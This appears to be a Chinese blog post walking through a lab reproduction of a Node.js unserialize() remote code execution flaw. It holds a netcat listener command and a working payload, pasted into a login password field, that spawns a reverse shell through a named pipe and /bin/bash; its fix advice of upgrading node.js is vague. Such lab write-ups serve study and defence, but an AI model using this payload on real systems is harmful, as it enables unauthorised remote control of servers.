美文网首页
Node.js 反序列化漏洞

Node.js 反序列化漏洞

作者: 此间不留白 | 来源:发表于2018-03-08 18:05 被阅读42次

    0x00 漏洞介绍

    node.js 存在反序列化远程代码任意执行漏洞,若不可信数据传入 unserialize() 函数中,通过 Javascript中的函数表达式(IIFE)在对象被创建时调用 serialize() 函数, 可以实现任意代码执行。

    0x01 漏洞复现

    • 首先,访问实验环境中搭建好的网站,可以看到一个node.js的登录页面
    1.PNG
    • 接着使用nc监听本地端口,用于接受漏洞环境的反弹shell,
      在linux终端中执行如下命令:
    nc -lv -p 8080
    

    表示监听本地8080端口。

    2.PNG
    • exp代码如下所示:
    _$$ND_FUNC$$_function (){require('child_process').exec('mknod backpipe p; nc <ip> <port> 0<backpipe | /bin/bash ]>backpipe')}()
    

    修改其中的<ip>为 本机ip,<port>为8080端口,用户名任意填写,复制exp到密码框,点击登录即可。

    • 在终端执行linux命令,发现执行成功,说明漏洞利用成功!
    3.PNG

    0x02 漏洞修复

    要修复此漏洞,只要将node.js升级到最新版本即可。

    相关文章

      网友评论

          本文标题:Node.js 反序列化漏洞

          本文链接:https://www.haomeiwen.com/subject/cnwyfftx.html